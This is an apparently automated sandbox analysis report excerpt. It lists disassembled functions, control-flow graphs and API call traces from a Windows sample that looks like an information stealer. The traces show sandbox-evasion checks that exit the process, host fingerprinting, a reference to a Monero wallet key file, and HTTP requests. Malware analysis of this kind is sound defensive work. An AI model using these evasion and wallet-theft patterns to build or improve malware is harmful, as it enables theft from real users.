5d5795-5d57d5 call 5da7a0 call 5c1590 call 5d51f0 call 5da8a0 call 5da800 1149->1250 1150->1145 1171 5d598f-5d5a14 call 5daad0 StrCmpCA 1164->1171 1172 5d5872-5d5879 1164->1172 1165->1270 1201 5d5a28-5d5a91 call 5da8a0 call 5da820 * 2 call 5c1670 call 5da800 * 4 call 5d6560 call 5c1550 1171->1201 1202 5d5a16-5d5a21 Sleep 1171->1202 1180 5d587b-5d58ce call 5da820 call 5da7a0 call 5c1590 call 5d51f0 call 5da8a0 call 5da800 1172->1180 1181 5d58d3-5d5948 call 5da740 * 2 call 5c1590 call 5d52c0 call 5da8a0 call 5da800 call 5daad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 5d594a-5d598a call 5da7a0 call 5c1590 call 5d51f0 call 5da8a0 call 5da800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                        APIs
                          • Part of subcall function 005DA820: lstrlen.KERNEL32(005C4F05,?,?,005C4F05,005E0DDE), ref: 005DA82B
                          • Part of subcall function 005DA820: lstrcpy.KERNEL32(005E0DDE,00000000), ref: 005DA885
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5857
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5228
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5318
                          • Part of subcall function 005D52C0: lstrlen.KERNEL32(00000000), ref: 005D532F
                          • Part of subcall function 005D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 005D5364
                          • Part of subcall function 005D52C0: lstrlen.KERNEL32(00000000), ref: 005D5383
                          • Part of subcall function 005D52C0: lstrlen.KERNEL32(00000000), ref: 005D53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 005D5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 28fd8635bced8cdb6b378f71cf32b279d74a75ab4c0e5974f16d4a9664a85856
                        • Instruction ID: 8ba83b07ca0485dd99febe5be08db0313af7c73c0ad9f452b2e67970c7119239
                        • Opcode Fuzzy Hash: 28fd8635bced8cdb6b378f71cf32b279d74a75ab4c0e5974f16d4a9664a85856
                        • Instruction Fuzzy Hash: B5E166729101459ACB28FBB8DC5AEFE7B38BF94300F50812BB40656291FF345B49DB96
                        Function 005D17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 5d17a0-5d17cd call 5daad0 StrCmpCA 1304 5d17cf-5d17d1 ExitProcess 1301->1304 1305 5d17d7-5d17f1 call 5daad0 1301->1305 1309 5d17f4-5d17f8 1305->1309 1310 5d17fe-5d1811 1309->1310 1311 5d19c2-5d19cd call 5da800 1309->1311 1313 5d199e-5d19bd 1310->1313 1314 5d1817-5d181a 1310->1314 1313->1309 1316 5d185d-5d186e StrCmpCA 1314->1316 1317 5d187f-5d1890 StrCmpCA 1314->1317 1318 5d1835-5d1844 call 5da820 1314->1318 1319 5d18f1-5d1902 StrCmpCA 1314->1319 1320 5d1951-5d1962 StrCmpCA 1314->1320 1321 5d1970-5d1981 StrCmpCA 1314->1321 1322 5d1913-5d1924 StrCmpCA 1314->1322 1323 5d1932-5d1943 StrCmpCA 1314->1323 1324 5d18ad-5d18be StrCmpCA 1314->1324 1325 5d18cf-5d18e0 StrCmpCA 1314->1325 1326 5d198f-5d1999 call 5da820 1314->1326 1327 5d1849-5d1858 call 5da820 1314->1327 1328 5d1821-5d1830 call 5da820 1314->1328 1332 5d187a 1316->1332 1333 5d1870-5d1873 1316->1333 1334 5d189e-5d18a1 1317->1334 1335 5d1892-5d189c 1317->1335 1318->1313 1340 5d190e 1319->1340 1341 5d1904-5d1907 1319->1341 1346 5d196e 1320->1346 1347 5d1964-5d1967 1320->1347 1349 5d198d 1321->1349 1350 5d1983-5d1986 1321->1350 1342 5d1926-5d1929 1322->1342 1343 5d1930 1322->1343 1344 5d194f 1323->1344 1345 5d1945-5d1948 1323->1345 1336 5d18ca 1324->1336 1337 5d18c0-5d18c3 1324->1337 1338 5d18ec 1325->1338 1339 5d18e2-5d18e5 1325->1339 1326->1313 1327->1313 1328->1313 1332->1313 1333->1332 1354 5d18a8 1334->1354 1335->1354 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1343 1343->1313 1344->1313 1345->1344 1346->1313 1347->1346 1349->1313 1350->1349 1354->1313
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 005D17C5
                        • ExitProcess.KERNEL32 ref: 005D17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: a82569da3e92dc05523a084d344dbbf577ce4f534a390cb63621b4c9022b8a6d
                        • Instruction ID: 8e1a3fa537d87c83bd0ef4ded5580289729a45be8feb2fa72f4958416093b4cb
                        • Opcode Fuzzy Hash: a82569da3e92dc05523a084d344dbbf577ce4f534a390cb63621b4c9022b8a6d
                        • Instruction Fuzzy Hash: 87517CB4A00209FBCB18DFA9D964ABE7BB5BF44304F10945BE406A7380D770EA51DB66
                        Function 005D7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 5d7500-5d754a GetWindowsDirectoryA 1357 5d754c 1356->1357 1358 5d7553-5d75c7 GetVolumeInformationA call 5d8d00 * 3 1356->1358 1357->1358 1365 5d75d8-5d75df 1358->1365 1366 5d75fc-5d7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 5d75e1-5d75fa call 5d8d00 1365->1367 1369 5d7619-5d7626 call 5da740 1366->1369 1370 5d7628-5d7658 wsprintfA call 5da740 1366->1370 1367->1365 1377 5d767e-5d768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 005D7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005D757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D760A
                        • wsprintfA.USER32 ref: 005D7640
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$^
                        • API String ID: 1544550907-519173996
                        • Opcode ID: a3509f9ce39c92af9889f64216dc50ed07b875a449d1c743110031a44ab2a492
                        • Instruction ID: 03897363387a0aeb4784af2fae56d28b5048c274046e42c4848dd416170c7f6b
                        • Opcode Fuzzy Hash: a3509f9ce39c92af9889f64216dc50ed07b875a449d1c743110031a44ab2a492
                        • Instruction Fuzzy Hash: 4A4183B1D04358ABDB20DF98DC45BEEBBB4BB48700F10409AF50567280E775AA44CBA5
                        Function 005D69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1608), ref: 005D98A1
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1680), ref: 005D98BA
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A15A8), ref: 005D98D2
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1560), ref: 005D98EA
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A15C0), ref: 005D9903
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A8B38), ref: 005D991B
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,01495088), ref: 005D9933
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,01494F48), ref: 005D994C
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1728), ref: 005D9964
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1590), ref: 005D997C
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1698), ref: 005D9995
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1740), ref: 005D99AD
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,01495148), ref: 005D99C5
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A16B0), ref: 005D99DE
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005C11D0: ExitProcess.KERNEL32 ref: 005C1211
                          • Part of subcall function 005C1160: GetSystemInfo.KERNEL32(?), ref: 005C116A
                          • Part of subcall function 005C1160: ExitProcess.KERNEL32 ref: 005C117E
                          • Part of subcall function 005C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005C112B
                          • Part of subcall function 005C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005C1132
                          • Part of subcall function 005C1110: ExitProcess.KERNEL32 ref: 005C1143
                          • Part of subcall function 005C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005C123E
                          • Part of subcall function 005C1220: __aulldiv.LIBCMT ref: 005C1258
                          • Part of subcall function 005C1220: __aulldiv.LIBCMT ref: 005C1266
                          • Part of subcall function 005C1220: ExitProcess.KERNEL32 ref: 005C1294
                          • Part of subcall function 005D6770: GetUserDefaultLangID.KERNEL32 ref: 005D6774
                          • Part of subcall function 005C1190: ExitProcess.KERNEL32 ref: 005C11C6
                          • Part of subcall function 005D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005C11B7), ref: 005D7880
                          • Part of subcall function 005D7850: RtlAllocateHeap.NTDLL(00000000), ref: 005D7887
                          • Part of subcall function 005D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005D789F
                          • Part of subcall function 005D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7910
                          • Part of subcall function 005D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005D7917
                          • Part of subcall function 005D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005D792F
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005D6AF9
                        • Sleep.KERNEL32(00001770), ref: 005D6B04
                        • CloseHandle.KERNEL32(?,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6B1A
                        • ExitProcess.KERNEL32 ref: 005D6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 9082fe51dbc1150998e17c5d3bdf227573a62077df81d7862961add7d46ee389
                        • Instruction ID: 6a4913a3a4ee56f756ab197d9da5b72ffbbebe96f0d5158a9bb5bcbf2e0631d2
                        • Opcode Fuzzy Hash: 9082fe51dbc1150998e17c5d3bdf227573a62077df81d7862961add7d46ee389
                        • Instruction Fuzzy Hash: E831527190020A9ADB28F7F4DC5AFEE7F78BF84340F00451BF542A2282DF705541D6A6
                        Function 005C1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 5c1220-5c1247 call 5d89b0 GlobalMemoryStatusEx 1439 5c1249-5c1271 call 5dda00 * 2 1436->1439 1440 5c1273-5c127a 1436->1440 1441 5c1281-5c1285 1439->1441 1440->1441 1444 5c129a-5c129d 1441->1444 1445 5c1287 1441->1445 1447 5c1289-5c1290 1445->1447 1448 5c1292-5c1294 ExitProcess 1445->1448 1447->1444 1447->1448
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005C123E
                        • __aulldiv.LIBCMT ref: 005C1258
                        • __aulldiv.LIBCMT ref: 005C1266
                        • ExitProcess.KERNEL32 ref: 005C1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 9feb2fc88d4b36707287b33d43b5f9b842785e560f02123f99c55d1d2c7b389c
                        • Instruction ID: 5c950a1cdf0b7f9104a59b85d27b7fe20b2b8fc1daeb4f2696553dfeffab30fe
                        • Opcode Fuzzy Hash: 9feb2fc88d4b36707287b33d43b5f9b842785e560f02123f99c55d1d2c7b389c
                        • Instruction Fuzzy Hash: 6A014BB4940308AEEB20EBE4CC49FAEBF78BB45701F208049E605B6282D67455818799
                        Function 005D6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 5d6af3 1451 5d6b0a 1450->1451 1453 5d6b0c-5d6b22 call 5d6920 call 5d5b10 CloseHandle ExitProcess 1451->1453 1454 5d6aba-5d6ad7 call 5daad0 OpenEventA 1451->1454 1460 5d6ad9-5d6af1 call 5daad0 CreateEventA 1454->1460 1461 5d6af5-5d6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005D6AF9
                        • Sleep.KERNEL32(00001770), ref: 005D6B04
                        • CloseHandle.KERNEL32(?,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6B1A
                        • ExitProcess.KERNEL32 ref: 005D6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: a6fcd2f000cf6b1a00c9599e9656d66ae94788e6b448cf23764058d0ea306761
                        • Instruction ID: d41ee2c47bf5f128532e07fc9a416dd917ca1f46d4006c2f991b524648b91e77
                        • Opcode Fuzzy Hash: a6fcd2f000cf6b1a00c9599e9656d66ae94788e6b448cf23764058d0ea306761
                        • Instruction Fuzzy Hash: 47F03A3094031AAAEB60ABA89C0ABBE7E74FB04701F108917B552A13D1DBB05542D656
                        Function 005C47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 0122a8f9a4f9e99602812fb91172345d558c5be027fd32afd8ecce6af19d5d62
                        • Instruction ID: 3051d5b3eab816cf40192462daeaa71ec75c17faadde136665eb0efabeeb5a6f
                        • Opcode Fuzzy Hash: 0122a8f9a4f9e99602812fb91172345d558c5be027fd32afd8ecce6af19d5d62
                        • Instruction Fuzzy Hash: 4B210EB1D00209ABDF14DFA4E849ADE7B75FB45320F108626F955A72D0EB706A09CB91
                        Function 005D51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C6280: InternetOpenA.WININET(005E0DFE,00000001,00000000,00000000,00000000), ref: 005C62E1
                          • Part of subcall function 005C6280: StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6303
                          • Part of subcall function 005C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C6335
                          • Part of subcall function 005C6280: HttpOpenRequestA.WININET(00000000,GET,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C6385
                          • Part of subcall function 005C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005C63BF
                          • Part of subcall function 005C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005C63D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5228
                        Strings
                        Memory Dump Source
